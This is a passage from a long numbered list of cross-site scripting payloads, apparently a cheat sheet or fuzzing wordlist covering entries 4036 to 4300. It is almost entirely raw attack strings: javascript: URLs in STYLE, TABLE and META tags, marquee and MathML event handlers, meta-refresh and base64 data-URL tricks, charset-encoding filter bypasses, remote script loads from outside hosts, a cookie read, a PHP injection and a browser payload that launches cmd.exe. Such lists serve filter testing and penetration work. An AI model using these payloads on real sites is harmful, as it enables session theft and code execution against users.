  4036. &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  4037. &lt;STYLE&gt;BODY{-moz-binding&#58;url(\”http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\”)}&lt;/STYLE&gt;
  4038. &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
  4039. &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
  4040. &lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
  4041. &lt;STYLE&gt;@import’http&#58;//ha&#46;ckers&#46;org/xss&#46;css’;&lt;/STYLE&gt;
  4042. &lt;STYLE&gt;@im\port’\ja\vasc\ript&#58;alert(\”XSS\”)’;&lt;/STYLE&gt;
  4043. &lt;STYLE&gt;li {list-style-image&#58; url(\”javascript&#058;alert(‘XSS’)\”);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  4044. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  4045. &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  4046. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
  4047. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
  4048. lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
  4049. &lt;STYLE type=\”text/css\”&gt;BODY{background&#58;url(\”javascript&#058;alert(‘XSS’)\”)}&lt;/STYLE&gt;
  4050. &lt;STYLE TYPE=\”text/javascript\”&gt;alert(‘XSS’);&lt;/STYLE&gt;
  4051. &lt;svg/onload=alert(63)//
  4052. &lt;svg/onload&equals;alert(1)&gt;
  4053. &lt;t&#58;set attributeName=\”innerHTML\” to=\”XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\”&gt;
  4054. &lt;TABLE BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  4055. &lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
  4056. &lt;TABLE&gt;&lt;TD BACKGROUND=\”javascript&#058;alert(‘XSS’)\”&gt;
  4057. &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  4058. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(“XSS”);&lt;/SCRIPT&gt;
  4059. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\”XSS\”);&lt;/SCRIPT&gt;
  4060. &lt;?xml&#58;namespace prefix=\”t\” ns=\”urn&#58;schemas-microsoft-com&#58;time\”&gt;
  4061. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\”javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert(‘XSS’);\”&gt;&#93;&#93;&gt;
  4062. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
  4063. &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;! — — &gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  4064. &lt;XML ID=\”xss\”&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\”javas&lt;! — — &gt;cript&#58;alert(‘XSS’)\”&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  4065. &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
  4066. &lt;XML SRC=\”xsstest&#46;xml\” ID=I&gt;&lt;/XML&gt;
  4067. ‘’;! — \”&lt;XSS&gt;=&{()}
  4068. &lt;XSS STYLE=\”behavior&#58; url(xss&#46;htc);\”&gt;
  4069. &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
  4070. &lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
  4071. &lt;XSS STYLE=\”xss&#58;expression(alert(‘XSS’))\”&gt;
  4072. maliciousdata[varinput[‘name’]] = payloads[1]
  4073. <marguee/onstart=alert(1)>//INJECTX
  4074. <marker id=”a” markerWidth=”1000" markerHeight=”1000" refX=”0" refY=”0">
  4075. “><marquee>confirm( `bypass :)`)</marquee>
  4076. <marquee/finish=confirm(2)>/
  4077. ‘“>><marquee><h1>1</h1></marquee>
  4078. <marquee><h1>XSS by xss</h1></marquee>
  4079. ‘>><marquee><h1>XSS</h1></marquee>
  4080. ‘>><marquee><h1>XSS</h1></marquee>
  4081. ‘“>><marquee><h1>XSS</h1></marquee>
  4082. ‘“>><marquee><h1>XSS</h1></marquee>
  4083. ‘“>><marquee><img src=x onerror=confirm(1)></marquee>
  4084. ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
  4085. “>><marquee><img src=x onerror=confirm(1)></marquee>” ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” ></script><script>alert(1)</script>”><img/id=”confirm&lpar; 1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http: //i.imgur.com/P8mL8.jpg”>
  4086. ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script><script>alert(1)</script>”><img/id=”confirm&lpar;1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http://i.imgur.com/P8mL8.jpg">
  4087. <marquee loop=1 width=0 onfinish=alert(1)>
  4088. >><marquee loop=1 width=0 onfinish=alert(1)>
  4089. <marquee loop=1 width=0 onfinish=alert(100)>
  4090. <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
  4091. <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
  4092. <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)
  4093. /><marquee onfinish=confirm(123)>a</marquee>
  4094. /><marquee onfinish=confirm(123)>a</marquee>
  4095. <marquee onScroll marquee onScroll=”javascript:javascript:alert(1)”></marquee onScroll>
  4096. <mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]
  4097. <marquee/onstart=alert()>
  4098. <marquee onstart=alert(1)>
  4099. <marquee/onstart=alert(1)>renwa
  4100. <marquee onstart=alert(30)></marquee>
  4101. <marquee onstart=alert(99)>
  4102. <marquee onstart=alert(‘XSS’)>
  4103. <marquee/onstart=confirm(2)>/
  4104. <marquee/onstart=confirm(2)>
  4105. <marquee/onstart=confirm(/XSS/.source);confirm(1)>
  4106. ><marquee/onstart=confirm(/XSS/.source);confirm(1)>
  4107. “<marquee/onstart=confirm(/XSS/.source);confirm(1)>”
  4108. “\”><marquee/onstart=confirm(/XSS/.source);confirm(1)>”,
  4109. <marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>
  4110. <marquee onstart=’javascript:alert(‘1’);’>=(?_?)=
  4111. <marquee onstart=’javascript:alert&#x28;1&#x29;’>^__^
  4112. <marquee onstart=’javascript:confirm&#x28;1&#x29;’>^__^
  4113. <marquee onStart marquee onStart=”javascript:javascript:alert(1)”></marquee onStart>
  4114. <marquee/onstart=this[‘innerHTML’]=location.hash;>//#<img src=x onerror=alert(document.domain)>
  4115. <marquee/onstart=this[‘innerHTML’]=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>
  4116. <marquee><script>alert(‘XSS’)</script></marquee>
  4117. <marquee><script>alert(‘XSS’)</script></marquee>
  4118. ‘;’>”><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
  4119. <math><annotation-xml encoding=text/html><![CDATA[></math><!]]>
  4120. <math><annotation-xml encoding=text/html><script></</script/>a<!>l<?>ert&lpar;</>1&rpar;</></script>
  4121. <math><annotation-xml encoding=”text/html”><xmp>&lt;/xmp&gt;&lt;img src=x onerror=alert(1)&gt;</xmp>
  4122. <math><annotation-xml><textarea/><svg><script>alert(1)</script>
  4123. <math><a xlink:href=javascript:…>
  4124. <math><a xlink:href=javascript:alert(1)>M
  4125. <math><a/xlink:href=javascript&colon;confirm&lpar;1&rpar;>click
  4126. <math><a/xlink:href=javascript:eval(‘\141\154\145\162\164\50\61\51’)>X
  4127. <math><a xlink:href=”//jsfiddle.net/t846h/”>click //
  4128. <math><a xlink:href=”//jsfiddle.net/t846h/”>click
  4129. <math><a xlink:href=”//jsfiddle.net/t846h/”>click
  4130. <Math> <a xlink:href=”//jsfiddle.net/t846h/”> click
  4131. <math><brute href=javascript:alert(1)>
  4132. <math><brute href=javascript:alert(1)>click *
  4133. <math><brute href=javascript:alert(1)>click
  4134. <math><brute href=javascript:alert(1)>click
  4135. <math><brute xlink:href=javascript:alert(175)>click
  4136. <math><brute xlink:href=javascript:alert(1)>click *
  4137. <math><brute xlink:href=javascript:alert(1)>click
  4138. <math><brute xlink:href=javascript:alert(1)>click
  4139. <math href=”javascript:alert(1)”>CLICKME
  4140. <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
  4141. <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
  4142. <math><kukux href=javascript:alert(164)>click
  4143. <math><kukux xlink:href=javascript:alert(175)>click
  4144. <math><maction actiontype=”statusline#http://google.com" href=”//evil”>click
  4145. <math><script>//<head><script>alert(1)</script>
  4146. <math><script>sgl=’<img/src=xx:x onerror=alert(1)>’</script>
  4147. <math><style>*{font-family:’<img/src=xx:x onerror=alert(1)>’}</style>
  4148. <math><!V href=javascript:alert(1)//
  4149. <math><!V” href=javascript:alert(1)//
  4150. <math xlink:href=javascript:..>
  4151. <math xlink:href=”jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”>click me</math>
  4152. <math xml:base=”javascript:alert(1)//”><mrow href=”#”>qwe</mrow></math>
  4153. <math xml:base=”javascript:alert(1)//”> <mrow href=”#”>qwe</mrow></math>
  4154. <math><XSS href=”javascript:alert(location)”>aaa
  4155. {{m=[({}).constructor.defineProperties];[[‘’.toString.constructor,{‘constructor’:{} }].reduce(m[0])];’’.toString.constructor(‘alert(1)’)()}}
  4156. <me#a http-equiv=Content-Security-Policy content=script-src self>
  4157. me!</button></form></dialog>
  4158. <menu id=x contextmenu=x onshow=alert(107)>right click me!
  4159. <menu id=x contextmenu=x onshow=alert(1)>right click me!
  4160. <meta charset=gbk><script>a=’x?\’;alert(1)//’;</script>
  4161. <meta charset=iso-2022-cn>
  4162. <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
  4163. <meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
  4164. <meta charset=iso-2022-jp><script>alert(14)[0x1B]$@[0x0A]</script>
  4165. <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>
  4166. <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(13)>
  4167. <meta charset=”mac-farsi”>?script?javascript:alert(1)?/script?
  4168. <meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
  4169. <meta charset= “x-imap4-modified-utf7”&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
  4170. <meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
  4171. <meta charset=”x-mac-farsi”>A?A?script A?A?confirm(1)//A?A?/script A?A?
  4172. <meta/content=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==”http-equiv=refresh>
  4173. <meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>
  4174. <meta content=”&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)” http-equiv=”refresh”/>
  4175. <Meta content = “& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)” http-equiv = “refresh” />
  4176. <meta content=”&NewLine; 1 &NewLine;; JAVASCRIPT&colon; confirm(1)” http-equiv=”refresh”/>
  4177. <META HTTP-EQUIV=”Link” Content=”<%(css)s>; REL=stylesheet”>
  4178. <;META HTTP-EQUIV=”;Link”; Content=”;<;http://ha.ckers.org/xss.css>;; REL=stylesheet”;>;
  4179. <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>; REL=stylesheet”>
  4180. <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>;; REL=stylesheet”>
  4181. <meta HTTP-EQUIV=”Link” Content=”<http://www.securitycompass.com/xss.css>; REL=stylesheet”>
  4182. <META HTTP-EQUIV=”Link” Content=”<http://xss.cx/xss.css>; REL=stylesheet”>
  4183. <META HTTP-EQUIV=”Link” Content=”<http://xxxx.com/xss.css>; REL=stylesheet”>
  4184. <META HTTP-EQUIV=”Link” Content=”<javascript:alert(‘XSS’)>; REL=stylesheet”>
  4185. <META HTTP-EQUIV=”Link” Content=”<javascript:confirm(document.location)>; REL=stylesheet”>
  4186. <meta http-equiv=”refresh” content=”0;
  4187. <meta http-equiv=refresh content=”0 javascript:alert(1)”>
  4188. <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>
  4189. <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>?
  4190. <meta http-equiv=”refresh” content=”0;javascript&colon;alert(1)”/>
  4191. <Meta http-equiv = “refresh” content = “0; javascript & colon; alert (1)” />
  4192. <meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>?
  4193. <meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>
  4194. “><meta http-equiv=”refresh” content=”0;javascript&colon;confirm(1)”/>
  4195. <meta http-equiv=refresh content=”0 javascript:confirm(1)”>
  4196. <meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
  4197. <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”;>;
  4198. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  4199. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  4200. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  4201. <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
  4202. <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
  4203. <Meta http-equiv = “refresh” content = “0; url = // goo.gl/nlX0P”>
  4204. <meta http-equiv=”refresh” content=”0;url=http://good/[>>>inj]&#59url=http://evil/[<<<inj]">
  4205. <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0; URL=http://;URL=javascript:alert(';XSS';);";>;
  4206. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
  4207. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
  4208. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(XSS);">
  4209. <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert('XSS');\">
  4210. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:confirm(document.location);">
  4211. <meta HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:document.vulnerable=true;">
  4212. <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:javascript:alert(1);">
  4213. <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(1);\”>
  4214. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XoSS’);”>
  4215. <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=javascript:alert(‘;XSS’;);”;>;
  4216. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
  4217. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
  4218. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(XSS);”>
  4219. <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
  4220. <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>
  4221. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:confirm(document.location);”>
  4222. <meta http-equiv=”refresh” content=”0;url=javascript:document.vulnerable=true;”>
  4223. <meta HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:document.vulnerable=true;”>
  4224. “><meta http-equiv=”Refresh” content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
  4225. “><meta http-equiv=”Refresh”content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
  4226. <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:javascript:alert(1);”>
  4227. <meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
  4228. <meta http-equiv=refresh content=”?,javascript&colon;alert(1)”>
  4229. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”>
  4230. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;confirm(document.location)&lt;/SCRIPT&gt;”>
  4231. <;META HTTP-EQUIV=”;Set-Cookie”; Content=”;USERID=<;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;”;>;
  4232. <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
  4233. <meta HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.vulnerable=true</SCRIPT>”>
  4234. <meta http-equiv=”x-ua-compatible” content=”ie=7">
  4235. <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
  4236. <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=��//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>��
  4237. <meta http-equiv=x-ua-compatible content=ie=8>
  4238. <meta http-equiv=”x-ua-compatible” content=”ie=9">
  4239. <meta http-equiv=”x-ua-compatible” content=”ie=9"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>
  4240. <meta name=referrer content=never>
  4241. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=”alert(1)”;
  4242. <meta style=”xss:expression(open(alert(1)))” />
  4243. <meter onmouseover=”alert(1)”
  4244. method=”dialog”><button>Close
  4245. <MovieHeight>600</MovieHeight>
  4246. ?movieName=”;]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
  4247. <MovieURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</MovieURL>
  4248. <MovieWidth>800</MovieWidth>
  4249. moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
  4250. $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
  4251. $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
  4252. myTagid=”someId” class=”class1vdata-foo=”bar” /myTag
  4253. myTagid=”someId” class=”class1vdata-foo=”bar”?/myTag
  4254. name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)
  4255. name=javascript:alert(document.domain)>
  4256. name=”javascript:alert(“XSS”)”></iframe>
  4257. <name>’,’’)); phpinfo(); exit;/*</name>
  4258. navigateToURL(new URLRequest(“Javascript: document.write(\”<script>confirm(1)</scr\”+\”ipt>\”)”),”_self”)
  4259. navigator.geolocation.getCurrentPosition(function(p){
  4260. navigatorurl:test” -chrome “javascript:C=Components.classes;I=Components.interfaces;file=C[\’@mozilla.org/file/local;1\’].createInstance(I.nsILocalFile);file.initWithPath(\’C:\’+String.fromCharCode(92)+String.fromCharCode(92)+\’Windows\’+String.fromCharCode(92)+String.fromCharCode(92)+\’System32\’+String.fromCharCode(92)+String.fromCharCode(92)+\’cmd.exe\’);process=C[\’@mozilla.org/process/util;1\’].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
  4261. navigator.vibrate(500)
  4262. navigator.webkitGetUserMedia({‘video’:true},function(s){
  4263. navigator.webkitGetUserMedia({video:true},function(s){
  4264. \nconfirm(1)
  4265. <NeatHtmlLt />&lt;BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  4266. <NeatHtmlLt />&lt;? echo(‘<NeatHtmlLt />&lt;SCR)’; echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
  4267. <NeatHtmlLt />&lt;IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
  4268. <NeatHtmlLt />&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  4269. <NeatHtmlLt />&lt;IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  4270. <NeatHtmlLt />&lt;IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
  4271. <NeatHtmlLt />&lt;IMG SRC=”javascript:alert(‘XSS’)”
  4272. <NeatHtmlLt />&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  4273. <NeatHtmlLt />&lt;?import namespace=”xss”implementation=”http://ha.ckers.org/xss.htc">
  4274. <NeatHtmlLt />&lt;META HTTP-EQUIV=”Link” Content=”<NeatHtmlLt />&lt;http://ha.ckers.org/xss.css>; REL=stylesheet”>
  4275. <NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh”CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
  4276. <NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert('XSS');">
  4277. <NeatHtmlLt />&lt;META HTTP-EQUIV=”refresh”CONTENT=”0;url=javascript:alert(‘XSS’);”>
  4278. <NeatHtmlLt />&lt;META HTTP-EQUIV=”Set-Cookie” Content=”USERID=&lt;SCRIPT&gt;alert(‘XSS’)&lt;/SCRIPT&gt;”>
  4279. <NeatHtmlLt />&lt;<SCRIPT>alert(“XSS”);//<NeatHtmlLt />&lt;</SCRIPT>
  4280. <NeatHtmlLt />&lt;SCRIPT\s” != “<NeatHtmlLt />&lt;SCRIPT/XSS\s
  4281. <NeatHtmlLt />&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
  4282. <NeatHtmlLt />&lt;SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  4283. /<NeatHtmlLt />&lt;script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i
  4284. <NeatHtmlLt />&lt;SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  4285. <NeatHtmlParserReset s=’’ d=”” /><script></script><TABLE BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  4286. <NeatHtmlReplace_BASE HREF=”javascript:alert(‘XSS’);//”>
  4287. <NeatHtmlReplace_BGSOUND SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
  4288. <NeatHtmlReplace_BODY BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
  4289. <NeatHtmlReplace_BODY ONLOAD_NeatHtmlReplace=”alert(‘XSS’)”>
  4290. <NeatHtmlReplace_C>&lt;IMG SRC=&quot;javascript:alert(‘XSS’);&quot;&gt;
  4291. </NeatHtmlReplace_C></NeatHtmlReplace_X></NeatHtmlReplace_xml><SPAN DATASRC_NeatHtmlReplace=”#I” DATAFLD_NeatHtmlReplace=”C” DATAFORMATAS_NeatHtmlReplace=”HTML”></SPAN>
  4292. <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
  4293. <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.swf" AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
  4294. <NeatHtmlReplace_FRAMESET><NeatHtmlReplace_FRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_FRAMESET>
  4295. </NeatHtmlReplace_HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
  4296. <NeatHtmlReplace_HEAD><NeatHtmlLt />&lt;META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7">
  4297. <NeatHtmlReplace_HTML xmlns:xss_NeatHtmlReplace=”xmlns:xss”>
  4298. <NeatHtmlReplace_IFRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_IFRAME>
  4299. <NeatHtmlReplace_INPUT TYPE=”IMAGE” SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
  4300. <NeatHtmlReplace_LAYER SRC_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_LAYER>
